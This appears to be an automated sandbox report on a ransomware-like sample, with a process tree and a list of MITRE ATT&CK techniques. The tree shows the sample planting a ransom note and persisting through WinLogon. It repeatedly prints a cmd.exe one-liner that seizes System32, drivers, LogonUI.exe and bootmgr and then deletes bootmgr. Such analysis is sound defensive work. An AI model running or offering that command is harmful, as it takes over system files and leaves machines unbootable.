  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
  2⤵
  PID:1244
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2592
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32 /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4772
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1720
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:196
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\LogonUI.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1984
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3324
- - C:\Windows\system32\takeown.exe
    takeown /f C:\bootmgr
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2160
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
  2⤵
  PID:3372
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:4140
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1928

C:\Users\Admin\Desktop\04df8dd30da8b5853f48cc1ac9b695a8.exe
"C:\Users\Admin\Desktop\04df8dd30da8b5853f48cc1ac9b695a8.exe"
1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Modifies registry class
PID:4796
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
  2⤵
  PID:1992
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4552
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32 /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4308
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:620
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2272
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\LogonUI.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1940
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3980
- - C:\Windows\system32\takeown.exe
    takeown /f C:\bootmgr
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
  2⤵
  PID:244
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:3684
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3520

C:\Users\Admin\Desktop\04df8dd30da8b5853f48cc1ac9b695a8.exe
"C:\Users\Admin\Desktop\04df8dd30da8b5853f48cc1ac9b695a8.exe"
1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Modifies registry class
PID:4116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit
  2⤵
  PID:456
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3952
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32 /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:672
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\drivers
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2808
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\drivers /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5048
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\LogonUI.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3192
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\LogonUI.exe /grant Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1100
- - C:\Windows\system32\takeown.exe
    takeown /f C:\bootmgr
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit
  2⤵
  PID:5048
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2720
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4832

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8bb2f9758,0x7ff8bb2f9768,0x7ff8bb2f9778
  2⤵
  PID:3804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8bb2f9758,0x7ff8bb2f9768,0x7ff8bb2f9778
  2⤵
  PID:3168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1688 --field-trial-handle=1756,i,14417144514781478960,719334843275409827,131072 /prefetch:2
  2⤵
  PID:384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1792 --field-trial-handle=1756,i,14417144514781478960,719334843275409827,131072 /prefetch:8
  2⤵
  PID:2296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2032 --field-trial-handle=1756,i,14417144514781478960,719334843275409827,131072 /prefetch:8
  2⤵
  PID:2348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2888 --field-trial-handle=1756,i,14417144514781478960,719334843275409827,131072 /prefetch:1
  2⤵
  PID:2992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2904 --field-trial-handle=1756,i,14417144514781478960,719334843275409827,131072 /prefetch:1
  2⤵
  PID:196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument C:\Users\Admin\Desktop\Lock.BackupGrant.shtml
1⤵
PID:1872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8bb2f9758,0x7ff8bb2f9768,0x7ff8bb2f9778
  2⤵
  PID:2680

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:96

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4564
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  PID:2440
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2440.0.100950924\1868808571" -parentBuildID 20221007134813 -prefsHandle 900 -prefMapHandle 1592 -prefsLen 17985 -prefMapSize 230273 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {edfc082b-bd75-4eee-a425-5efa8a417f7c} 2440 "\\.\pipe\gecko-crash-server-pipe.2440" 1700 1ecad5edc58 socket
    3⤵
    PID:3660
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2440.1.411885498\1386801045" -parentBuildID 20221007134813 -prefsHandle 2208 -prefMapHandle 1900 -prefsLen 19056 -prefMapSize 230273 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02d7a5b3-2f8e-4bd0-b065-2e0721c92fa4} 2440 "\\.\pipe\gecko-crash-server-pipe.2440" 2080 1ecaea4ae58 gpu
    3⤵
    PID:3468
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2440.2.1204479289\443094980" -childID 1 -isForBrowser -prefsHandle 3188 -prefMapHandle 3184 -prefsLen 20119 -prefMapSize 230273 -jsInitHandle 1108 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60da0e03-c00e-4a65-8435-2fda6052186a} 2440 "\\.\pipe\gecko-crash-server-pipe.2440" 3196 1ecafca2358 tab
    3⤵
    PID:4308
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2440.3.5087299\1273290444" -childID 2 -isForBrowser -prefsHandle 3888 -prefMapHandle 3884 -prefsLen 21312 -prefMapSize 230273 -jsInitHandle 1108 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dc1d6ee7-d7e0-4858-b29d-9c4bc9449b37} 2440 "\\.\pipe\gecko-crash-server-pipe.2440" 3900 1eca376b458 tab
    3⤵
    PID:1984
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2440.4.572271784\19332598" -childID 3 -isForBrowser -prefsHandle 2576 -prefMapHandle 3700 -prefsLen 26932 -prefMapSize 230273 -jsInitHandle 1108 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4ff36e6-f578-4682-a73c-a233431909b3} 2440 "\\.\pipe\gecko-crash-server-pipe.2440" 3772 1eca2f60d58 tab
    3⤵
    PID:2360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
PID:1724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff8bb2f9758,0x7ff8bb2f9768,0x7ff8bb2f9778
  2⤵
  PID:3412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1548 --field-trial-handle=1800,i,14146778520961615942,6665579404829187056,131072 /prefetch:2
  2⤵
  PID:1600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 --field-trial-handle=1800,i,14146778520961615942,6665579404829187056,131072 /prefetch:8
  2⤵
  PID:2364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2092 --field-trial-handle=1800,i,14146778520961615942,6665579404829187056,131072 /prefetch:8
  2⤵
  PID:1460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery